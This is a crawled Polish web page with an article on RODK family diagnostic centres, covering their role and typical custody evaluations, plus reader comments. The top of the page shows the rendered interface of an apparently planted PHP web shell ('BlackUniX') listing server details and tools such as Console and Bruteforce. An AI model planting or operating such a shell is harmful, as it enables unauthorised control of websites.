W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-21 19:48:49
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.166.141.12
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Pierwsza wizyta w RODK'u
16.03.2008.
Na pewno niejednokrotnie spotkaliście się z różnymi opiniami na temat Rodzinnych Ośrodków Diagnostyczno - Konsultacyjnych. Nie miejmy złudzeń, to tylko placówki specjalistyczne Ministra Sprawiedliwości, które siłą rzeczy służą sądom. Jakie są ich statutowe zadania? Jak wygląda typowa wizyta? 
Rodzinne Ośrodki Diagnostyczno - Konsultacyjne są placówkami specjalistycznymi Ministra Sprawiedliwości. Sposób ich finansowania wydaje się tłumaczyć jeden z fragmentów rozporządzenia, w którym czytamy, że kierownik RODK: dysponuje środkami finansowymi wydzielonymi z funduszu sądu okręgowego, określonymi w planie finansowym ośrodka.

Inaczej mówiąc RODK jest częścią aparatu sprawiedliwości.

RODKi Są placówkami działającymi nie tylko na rzecz sądu, ale także na rzecz policji i prokuratury.

Jak czytamy w rozporządzeniu do zadań ośrodka należy:

1) przeprowadzanie badań psychologicznych, pedagogicznych lub lekarskich oraz wydawanie na ich podstawie opinii na zlecenie sądu lub prokuratora,

2) prowadzenie mediacji w sprawach nieletnich i sprawach rodzinnych na zlecenie sądu,

3) sprawowanie opieki specjalistycznej nad nieletnimi skierowanymi przez sąd,

4) prowadzenie poradnictwa specjalistycznego dla nieletnich, ich rodzin oraz rodzin zagrożonych demoralizacją, na zlecenie sądu,

5) współdziałanie z placówkami wykonującymi orzeczenia sądu, instytucjami i organizacjami zajmującymi się problematyką ochrony i umacniania rodziny.

Ogólnie można powiedzieć, że RODKi zajmują się diagnozą sytuacji w rodzinie. Badają więzi między małoletnimi dziećmi i rodzicami, poziomem rozwoju dziecka – czy jest adekwatny do jego wieku, czy zaburzony itd. Pomagają także w przezwyciężaniu trudności wychowawczych, a nawet, jak czytamy na jednej ze stron internetowych sądu, prowadzi działania psychoterapeutyczne. Ponadto w rozporządzeniu można jeszcze wyczytać, że RODK przesyła Wezwania na badania przez pocztę za zwrotnym poświadczeniem odbioru wezwania, a w razie potrzeby może wezwać telefonicznie.

Termin wydania opinii nie powinien przekraczać 14 dni w sprawach nieletnich i 30 dni w pozostałych sprawach, licząc od dnia zakończenia badania. W większości wypadków, badania psychologiczne, pedagogiczne lub lekarskie niezbędne do wydania opinii przeprowadza się w siedzibie ośrodka.

Warto też zwrócić uwagę, że sąd podejmuje decyzję w postaci wyroku na podstawie wielu elementów sprawy np. : zeznań świadków, sytuacji materialnej, czy wreszcie opinii RODK. Krótko mówiąc opinia RODK nie musi być rozstrzygająca. Jest tylko jedną z wielu przesłanek do wydania wyroku.

Ważne jest, że choć RODKi diagnozują w sprawach dotyczących małoletnich, w badaniach bierze udział cała rodzina.

Jak wygląda przykładowe badanie w sprawie o opiekę nad dzieckiem?

Badani mogą rozwiązywać testy pedagogiczne i psychologiczne. Przeprowadzane są indywidualne i nie indywidualne rozmowy z członkami rodziny. Obserwacji podlega relacja każdego rodzica z dzieckiem.


Przykładowa wizyta w RODK – sprawa o powierzenie/ograniczenie władzy rodzicielskiej:

-test psychologiczny dla każdego z rodziców osobno, osobny test dla dziecka

-rozmowa z rodzicami – z każdym z osobna

-indywidualna rozmowa z dzieckiem

-obserwacja relacji dziecka z rodzicem, z którym nie mieszka (bez udziału drugiego rodzica)


Oczywiście, jeśli dziecko jest bardzo małe test, czy indywidualna rozmowa z dzieckiem może być nie możliwa.

 
« poprzedni artykuł   następny artykuł »

komentarze

Jest też opinia wśród innych psychologów na temat pań z RODK ale jej tu nie przytoczę gdyż słowa te łamią zasady forum:)

Napisał krzysztof007, dzień 01/20/2009 o 17:37

np. żaden szanujący się psycholog nie wyda opinii /która często rzutuje na jego los i jego rodziców/ o dziecku na podstawie jednego kilunastominutowego spotkania. Dzieci też mają różne fazy i okresy to co mówi jednego dnia nie oznacza że za kilka dni czy tygodni bedzie takie samo.A często odzwierciedla np.że ostatnio jest pod dużym wpływem np.jednego rodzica.

Dla mnie osobiście te badania to 'bzdura', raczej dla dobra dziecka powinny te ośrodki dążyć do zapewnienia swobody kontaktów dziecka z rodzicem i odwrotnie bo nie ma nic lepszego nad prawo naturalne.Po to ma dziecko rodziców żeby mogło w każdej chwili być przy nich i rodzice przy dziecku.
Wiele pań tam pracujących ma bardzo dziwaczne poglądy i koncepcje, i próbują sie wtrącać w czyjeś życie po 15-minutowej rozmowie.
Trochę to śmieszne.

Napisał krzysztof007, dzień 01/20/2009 o 17:31

słowo 'specjalistyczne' to zbyt dużo powiedziane.Ja mam poważne obawy co do jakości, bezstronności i sposobu przeprowadzania tam badań.

Według mnie jak na tak ważny dok. jak tzw.'opinia rodk' jest zbyt duża swoboda interpretacyjna badań, wątpliwe jakość badań /według mnie sposób badania zbliżony do wróżenia z fusów/ aby takie badanie mogło być wiarygodne.

Zbyt dużo zależ od własnych poglądów i przekonań pań tam badających a zbyt mało nauki, rzetelności i bezstronności.Tak naprawdę nie ma nad tym żadnej kontroli, i jest tu miejsce do ogromnych nadużyć w tak ważnych sprawach jak los dziecka i rodziny.

Napisał krzysztof007, dzień 01/20/2009 o 17:24

 1 
Strona 1 z 1 ( 3 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


21.06.2018.